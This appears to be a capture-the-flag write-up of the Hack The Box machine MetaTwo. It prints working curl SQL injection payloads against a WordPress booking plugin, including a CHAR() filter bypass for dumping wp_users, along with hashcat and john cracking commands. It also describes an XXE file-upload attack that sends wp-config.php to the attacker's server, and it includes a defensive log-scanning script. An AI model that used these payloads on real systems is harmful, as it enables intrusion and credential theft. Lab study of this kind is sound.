HTB: MetaTwo

ShellPunk

Jorge Moreno / November 16, 2022


Reconnaissance

As always, the first step is reconnaissance, but in this case it is not strictly necessary because this is a CTF. So we move straight to scanning and launch nmap (-oA writes the results in all three output formats under the given basename):

nmap -sV -sC -oA metatwo 10.10.11.186

As you can see in the image above, port 80 exposes a URL. This is a reference to the domain name used by the web page. Open the /etc/hosts file and add that domain name together with the IP.

Next, we can access metapress.htb/events, as shown on the main page, and play around with the options of the page.

The most interesting part is the WordPress booking component. Looking at the source code I found the name and version of this component.

Vulnerability Analysis

With the data obtained you can do some research on the Internet. In a few minutes I found the BookingPress vulnerability. Easy peasy, right?

SQL Injection

The key part for this vulnerability to work is a field named _wpnonce, located in the source code of the BookingPress component.

Using that field and the data above it is possible to enumerate some information from the database.

curl -i 'https://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=7c71a4df9b&category_id=33&total_service=-7502) \
  UNION ALL SELECT @@version,@@version_comment,@@version_compile_os,1,2,3,4,5,6-- -'

As you can see, the field bookingpress_service_id is filled with the information that I queried using SQL injection.

Next, I enumerate the databases from information_schema.schemata:

curl -i 'http://metapress.htb/wp-admin/admin-ajax.php' \
  --data 'action=bookingpress_front_get_category_services&_wpnonce=7c71a4df9b&category_id=33&total_service=-7502) \
  UNION ALL SELECT (select group_concat(schema_name) from information_schema.schemata),1,2,3,4,5,6,7,8-- -'

Here the target database is blog.

The next step is to enumerate tables. It looks like something is not working with our query; after some tests I discovered there is a filter on specific characters.

1 union select 1,1,char(116,101,120,116),user_login,user_pass,null,0,0,null,null,null,null,null,null,null,null,null from wp_users

To bypass this filter I use the MySQL function CHAR() with the corresponding ASCII codes. In the end it was possible to enumerate the tables.

I dump all the users. The most important one is admin, but in some cases (like this one) you can only break into the system with the least privileged user.
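As an added defensive example (not code from the original post), here is a small Python scanner that flags admin-ajax.php requests whose POST body carries the patterns used in the chain above (UNION SELECT, the CHAR() bypass, wp_users, information_schema) or a non-integer value in the plugin's numeric parameters. The log format with the request body as a final quoted field, the nonce value and the sample lines are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, unquote_plus

# Constructed sample log (not from the original post). Assumes a web-server log
# format that appends the URL-encoded POST body as a final quoted field.
SAMPLE_LOG = """\
10.10.14.5 - - [16/Nov/2022:10:01:02 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 512 "action=bookingpress_front_get_category_services&_wpnonce=deadbeef00&category_id=33&total_service=4"
10.10.14.5 - - [16/Nov/2022:10:01:09 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 2048 "action=bookingpress_front_get_category_services&_wpnonce=deadbeef00&category_id=33&total_service=-7502)+UNION+ALL+SELECT+%40%40version,1,2,3,4,5,6,7,8--+-"
10.10.14.5 - - [16/Nov/2022:10:02:41 +0000] "POST /wp-admin/admin-ajax.php HTTP/1.1" 200 2048 "action=bookingpress_front_get_category_services&_wpnonce=deadbeef00&category_id=33&total_service=1+union+select+1,1,char(116,101,120,116),user_login,user_pass+from+wp_users"
"""

# Request line, status, size, then the quoted body.
LINE_RE = re.compile(r'"[A-Z]+ (?P<path>\S+) [^"]*" \d{3} \d+ "(?P<body>[^"]*)"$')

# Patterns from the injection chain above, matched on the URL-decoded body.
RULES = [
    ("union_select", re.compile(r"\bunion\b(?:\s+all)?\s+select\b", re.I)),
    ("char_bypass", re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)+\s*\)", re.I)),
    ("schema_enum", re.compile(r"information_schema", re.I)),
    ("wp_users", re.compile(r"\bwp_users\b", re.I)),
]
NUMERIC_PARAMS = ("category_id", "total_service")  # the plugin expects integers


def analyse_body(body: str) -> list[str]:
    """Return the names of every rule that fires on one POST body."""
    decoded = unquote_plus(body)
    hits = [name for name, rx in RULES if rx.search(decoded)]
    params = parse_qs(decoded, keep_blank_values=True)
    for key in NUMERIC_PARAMS:
        # Anything but an integer in a numeric id is a signal on its own;
        # it is exactly what a prepared statement would have rejected.
        if any(not re.fullmatch(r"-?\d+", v.strip()) for v in params.get(key, [])):
            hits.append(f"non_numeric_{key}")
    return hits


def scan_log(text: str) -> list[dict]:
    """Flag admin-ajax.php requests whose body looks like the SQLi above."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        m = LINE_RE.search(line)
        if not m or not m.group("path").endswith("/admin-ajax.php"):
            continue
        hits = analyse_body(m.group("body"))
        if hits:
            findings.append({"line": lineno, "rules": hits})
    return findings
```

Running scan_log(SAMPLE_LOG) reports lines 2 and 3 only; the benign first request with an integer total_service passes clean.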

Cracking Password Hashes

In this case, to brute force the password hashes I use the famous rockyou wordlist and hashcat:

hashcat -m 400 hashes.txt /usr/share/wordlists/rockyou.txt

In just a few minutes hashcat found the password of the manager user. I tested this password against the FTP and SSH services to check whether the user is reusing passwords. No luck.

Authenticated XXE

With the credentials of the manager user it was possible to identify a file upload feature on the site, which is very interesting. Using searchsploit it was possible to identify the next step.

Researching this exploit I found this interesting article about the XXE vulnerability.

Exploitation

Following the above article and the exploit from searchsploit I was able to craft a malicious WAV file to deliver to the target.

I run an HTTP server on my local machine; the target reads the xx3.dtd file and finally sends the wp-config.php file, compressed and base64 encoded, in a GET request to my local machine. Beautiful!

I use a PHP one-liner to decode the base64 string and decompress it (the string is assigned to a variable first, since a single-quoted '$base64' would be taken literally):

<?php $base64 = 'PASTE_THE_BASE64_STRING_HERE'; echo zlib_decode(base64_decode($base64)); ?>

And finally we can see the content of the file in plain text, with two very useful passwords.

As before, I use these passwords to check whether they work on the SSH service. Again, no luck.

So I go for the FTP service, connect, and get access to two directories. The blog directory contains the entire WordPress site, with nothing interesting.

The mailer directory is where I found what I was looking for: a user and password to access SSH.

I enter the credentials over SSH and get the user.txt file.

Privilege Escalation

Looking around for a way to escalate privileges, I found a directory with interesting PGP keys. Passpie is a password manager.

I download the .keys file and extract the private key. Then I use gpg2john to convert it to john format and crack it:

gpg2john private_key_file > private.key

Then I just use john with the rockyou wordlist:

john -w=/opt/SecLists/Passwords/Leaked-Databases/rockyou.txt private.key

Once I get the password from john I use it to export the passwords saved in Passpie:

jnelson@meta2:~$ passpie export passes.txt

With the password in plain text I log in as the root user and read the root.txt file:

# log in as the root user
su

# change directory to root
cd /root

# get root flag
cat root.txt

Summary

As we can see, it is highly recommended to keep WordPress updated, and above all its plugins must be kept patched and up to date.

It is a good option to keep passwords and secrets in environment variables instead of in plain text in configuration files. In the case of file disclosure attacks this is a protection that helps us.

Use complex passwords in all accounts and products to make it difficult for attackers to break them.

Thank you!

I apologize for my English. I have a lot to improve.

Thanks for reading!
